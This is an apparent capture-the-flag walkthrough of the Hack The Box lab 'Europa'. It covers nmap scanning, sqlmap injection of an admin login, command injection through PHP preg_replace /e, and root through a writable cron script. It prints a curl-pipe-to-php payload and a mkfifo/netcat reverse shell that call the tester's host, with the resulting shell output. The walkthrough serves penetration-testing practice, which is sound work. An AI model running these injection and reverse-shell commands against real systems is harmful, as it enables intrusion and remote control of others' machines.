HTB – Europa

Today we are going to solve another CTF challenge “Europa” which is available online for those who want to increase their skill in penetration testing. Europa is retried vulnerable lab presented by Hack the Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 15:43 W. Europe Standard Time
Nmap scan report for 10.10.10.22
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after: 2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.94 seconds

As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that tradition in this also but Bad Unluckily!! This time it didn’t work at all.

Now the last option was to add target IP inside /etc/host file since port 443 was open containing two domain names and as it is a challenge of hack the box thus I edit europacorp.htb and admin-portal.europcorp.htb as a hostname.

Then I explore domain name: admin-portal.europcorp.htb through the web browser and found following login page as shown below.

In order breach confidentiality we can try SQL form based attack and for this, I preferred sqlmap following command to enumerate database name.

sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form --dbs --batch

Luckily our assumption set true and it dumbs the database name “admin”.

Then I run following command for enumerating entire table details.

sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form -D admin --all --batch

Awesome!! I found a table “users” which 2 entries having the username and password columns.

Using online MD5 decryption I cracked hash password and received “SupersecretPassword!” and use these credential to login into admin console.

After fruitfully validation I got dashboard from where I step towards Tools options.

It was set up with a script for open VPN generator using the PHP function preg_replace() on user input. When I investigate more related to this function, it is suggested not to use preg_replace() on user input as it can lead to command execution vulnerability.

Considering above suggestion true, I fetched its request into burp suite and sent it to the repeater for exploit command injection vulnerability.

Here I notice three parameter pattern, ipaddress, and test where we can add our arbitrary code for execution but before that, you need to know correct step “how to exploit it” manually.

So when I search more related to this then I found so many links which was describing /e option is a threat to PHP preg_replace function.

Now the code can be execute by sending http post request as given below format.

pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres

For example:  To check directory list we can run following command and verify resultant output.

pattern=/ip_address/e&ipaddress=ls &text=ip_addres

Similarly we can run any malicious code inside this for achieving reversion connection.

Now it’s just the matter changing the system() command parameters and getting a reverse shell. Set up an http server for serving the php file. and a netcat listener for catching the shell

D:\PENTEST\HTB\europa>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [07/Nov/2018 09:22:20] "GET /shell.php HTTP/1.1" 200 -
next  burp : system('curl http://10.10.14.28/shell.php | php') 


C:\Users\hillie>nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 43764
Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
10:16:14 up 13:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@europa:/var/www/cmd$ whoami && id 
whoami && id 
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

Privilege escalation

Following my usual information gathering steps I find a running vulnerable cronjob!

$ cat /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you do not have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs <---- THIS ONE HERE

Cron is calling a clearlogs script at /var/www/cronjobs/clearlogs with root privileges. Content of clearlogs:

$ cat /var/www/cronjobs/clearlogs

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

Clearlogs script clears access.log and executes /var/www/cmd/logcleared.shwhich we have write access to! (OR if the file doesn’t exist, create it and chmod 777 it). Because we can write to the file, we can control what is written in it. Long story short, we can easily control what will be executed as root each time the cron job runs. I just made another reverse shell which connected to me –

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9876 > /tmp/f" > script.sh

Note: Make sure both netcat connections are connected via a different port, using the same one won’t work.

Once the cronjob calls /var/www/cronjobs/clearlogs our malicious logcleared.sh file will be executed which will give us a root shell!

C:\Users\hillie>nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 49460
/bin/sh: 0: can't access tty; job control turned off
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@europa:~# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
europa

Author : Jacco Straathof

Author Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *